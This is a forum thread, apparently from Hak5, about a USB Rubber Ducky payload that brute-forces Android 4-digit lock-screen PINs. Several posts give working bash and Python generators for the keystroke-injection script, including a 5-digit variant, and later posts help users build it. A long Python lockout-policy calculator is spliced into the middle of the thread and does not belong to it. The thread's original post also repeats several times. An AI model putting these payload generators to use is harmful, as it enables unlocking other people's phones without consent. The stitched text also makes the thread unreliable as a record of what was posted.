Hak5 Forums
Darren Kitchen

[Payload] Android Brute Force 4-digit pin


The Ducky script works great, Major props for this Darren. I've been using a micro USB hub 3 in 1 powered with an external battery to keep the phone charged for the time needed to brute force the pin. How can I amend the Ducky script to capture the correct pin as a text file on the Ducky?

kerravon   
On 06/12/2012 at 11:31 PM, Darren Kitchen said:

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

[image: 20121205_125338.jpg]

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

[CODE]
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

Hey Darren,

Any chance of putting your 600k script on github so we can look at it?
cheers
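The 16.6 hour and 166 hour figures in Darren's quoted post are nothing more than arithmetic over the lockout policy (5 tries, then a 30 second timeout), and the same arithmetic is what a defender uses to decide whether a longer PIN, an escalating lockout, or a wipe threshold actually closes the window. The following Python is an added example for this thread, not code from the forum or from Hak5; the "doubling" and "wipe after 10 failures" policies it compares are assumed parameter sets chosen to illustrate the calculation, not Android defaults.

```python
"""Worst-case exposure of a numeric PIN under a lockout policy.

Added example for this thread, not code from the forum or from Hak5.
It reproduces the arithmetic behind the "5 tries then a 30 second
timeout" figures quoted above and extends it to two defensive policies:
an escalating lockout and a wipe after N failures. Every policy object
built here is an assumed parameter set for illustration, not an Android
default.
"""
import math
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class LockoutPolicy:
    attempts_per_window: int                   # guesses allowed before a lockout
    lockout_seconds: float                     # length of the first lockout
    backoff_factor: float = 1.0                # >1.0 makes each lockout longer
    max_lockout_seconds: float = math.inf      # cap on an escalating lockout
    wipe_after_failures: Optional[int] = None  # None: the device never wipes


def keyspace(pin_length: int) -> int:
    """Number of distinct numeric PINs of the given length."""
    return 10 ** pin_length


def lockout_total(lockouts: int, policy: LockoutPolicy) -> float:
    """Total time spent waiting out `lockouts` consecutive lockouts.

    The i-th lockout (i starting at 0) lasts min(first * factor**i, cap), so
    the waits below the cap form a geometric series and the rest all equal
    the cap. The closed form keeps this cheap even for a 10-digit keyspace.
    """
    first, factor, cap = (policy.lockout_seconds, policy.backoff_factor,
                          policy.max_lockout_seconds)
    if lockouts <= 0:
        return 0.0
    if factor == 1.0:
        return lockouts * min(first, cap)
    if cap == math.inf:
        uncapped = lockouts
    else:
        uncapped = min(lockouts, max(0, math.ceil(math.log(cap / first, factor))))
    geometric = first * (factor ** uncapped - 1) / (factor - 1)
    return geometric + (lockouts - uncapped) * cap


def exhaust_seconds(pin_length: int, policy: LockoutPolicy,
                    seconds_per_attempt: float = 0.0) -> float:
    """Worst-case wall-clock time to try every PIN of the given length.

    Returns math.inf when a wipe threshold stops the search before the
    keyspace is covered. The last window needs no lockout after it.
    """
    n = keyspace(pin_length)
    if policy.wipe_after_failures is not None and policy.wipe_after_failures < n:
        return math.inf
    windows = math.ceil(n / policy.attempts_per_window)
    return n * seconds_per_attempt + lockout_total(windows - 1, policy)


def success_probability(pin_length: int, policy: LockoutPolicy) -> float:
    """Chance that a uniformly random PIN is found before a wipe fires.

    With a wipe after N failures the attacker gets at most N guesses.
    """
    if policy.wipe_after_failures is None:
        return 1.0
    return min(1.0, policy.wipe_after_failures / keyspace(pin_length))


def describe(seconds: float) -> str:
    """Human-readable duration for the summary table."""
    if math.isinf(seconds):
        return "never (wipe)"
    if seconds < 86400:
        return f"{seconds / 3600:.1f} hours"
    if seconds < 365.25 * 86400:
        return f"{seconds / 86400:.1f} days"
    return f"{seconds / (365.25 * 86400):.1f} years"


if __name__ == "__main__":
    # Assumed policies: the first matches the thread's figures, the other
    # two are illustrative hardening choices, not Android defaults.
    policies = {
        "5 tries / 30 s fixed":    LockoutPolicy(5, 30),
        "5 tries / 30 s doubling": LockoutPolicy(5, 30, backoff_factor=2.0,
                                                 max_lockout_seconds=3600),
        "wipe after 10 failures":  LockoutPolicy(5, 30, wipe_after_failures=10),
    }
    for name, policy in policies.items():
        for length in (4, 5, 6, 10):
            print(f"{name:24} {length:2}-digit: "
                  f"{describe(exhaust_seconds(length, policy)):>14}  "
                  f"p(success)={success_probability(length, policy):.5f}")
```

With the fixed policy the four-digit case lands on the quoted 16.6 hours and the five-digit case on 166 hours; a lockout that doubles up to an hour stretches the same four-digit search to roughly 83 days, and a wipe after 10 failures gives the attacker a 0.1% chance on four digits before the device erases itself. The `seconds_per_attempt` argument is there for the per-pin DELAY and ENTER time that the quoted estimate ignores.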

b0N3z
[CODE]
echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt
[/CODE]

5 digit

On 6/28/2017 at 0:36 PM, b0N3z said:

[CODE]
echo DELAY 5000 > android_brute-force_over-9000.txt; echo {00000..99999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_over-9000.txt
[/CODE]

5 digit

That will take a very long time..

b0N3z   
10 hours ago, Dave-ee Jones said:

That will take a very long time..

as per Darren about 166hrs

Hey, I made a script to make the 4 digit combinations in Python, so if you have Python just copy the code and run it, and in the output you will have the combinations.

In Python it was harder to make because Python is not made to do brute force and has its limits, but finally I made the code.

(I am just 15 years old and a beginner in Python, so possibly the code could be better than that.)

Here is the code:

[CODE]
"""
Change x = 0 below.
Put only 1-9 and copy all the code,
and then you have the payload.
"""
x = 0        # thousands digit of the PINs to generate
number = 0   # the remaining three digits, counted up from 0
while number <= 9:
    print("STRING", str(x) + "00" + str(number))
    print("ENTER")
    if number in list(range(0, 9, 5)):   # DELAY whenever number is 0 or 5
        print("DELAY 34250")
        number += 1
    else:
        number += 1
        if number == 10:
            while number <= 100:
                print("STRING", str(x) + "0" + str(number))
                print("ENTER")
                if number in list(range(10, 100, 5)):   # DELAY at 10, 15, ..., 95
                    print("DELAY 34250")
                    number += 1
                else:
                    number += 1
                    if number == 100:
                        while number != 1000:
                            print("STRING", str(x) + str(number))
                            print("ENTER")
                            if number in list(range(100, 999, 5)):   # DELAY at 100, 105, ..., 995
                                print("DELAY 34250")
                                number += 1
                            else:
                                number += 1
                                if number == 1000:
                                    x += 1
                                    break
[/CODE]

On ‎12‎/‎12‎/‎2012 at 5:36 PM, keb0x80 said:

I created a script to generate pretty much the same output using only bash loops/conditions

[CODE]
#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
  count=$((count+1))
  echo "STRING $pin"
  # After every other pin, do this
  if [ $((count % 2)) -eq 0 ]; then
    echo "DELAY 1000"
    echo "ENTER"
    echo "ENTER"
  fi
  # After 5 pins, do this
  if [ $((count % 5)) -eq 0 ]; then
    for (( delay=0; delay<4; delay++ ))
    do
      echo "DELAY 5000"
      echo "ENTER"
    done
  fi
done
[/CODE]

 

I'm on the duck tool kit.com and when I put this in the encoder it rejects it as "does not recognize ! in bash". What am I doing wrong?

On ‎12‎/‎6‎/‎2012 at 7:38 PM, Darren Kitchen said:

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

 

On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

[image: 20121205_125338.jpg]

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

[CODE]
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

I'm on duck tool kit.com and trying to use this script but it doesn't work. What am I doing wrong?

On ‎6‎/‎30‎/‎2017 at 0:15 PM, b0N3z said:

as per Darren about 166hrs

I'm on the duck tool kit and I can't seem to get the script to work. Any insight?

b0N3z   

The script is made to run in a bash terminal to create the text file needed to make the inject.bin file for the ducky. This won't work if you just try to convert the command.

On ‎12‎/‎6‎/‎2012 at 5:31 PM, Darren Kitchen said:

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

[image: 20121205_125338.jpg]

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

[CODE]
echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

 

So how do I use this code on your duck tool kit.com site?

b0N3z   
On 7/5/2017 at 6:24 PM, TTT101907 said:

So how do I use this code on your duck tool kit.com site?

Do you have linux?

dyurnoev   

Hi, I'm a newbie :P .. how can I encode this code so it works and create inject.bin?

Then put it into an Android smartphone with the USB Rubber Ducky?

Because the code

[CODE]
#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " 
[/CODE]

It says that it is not an appropriate language and I can't create the inject file on duckytools. Thanks

 
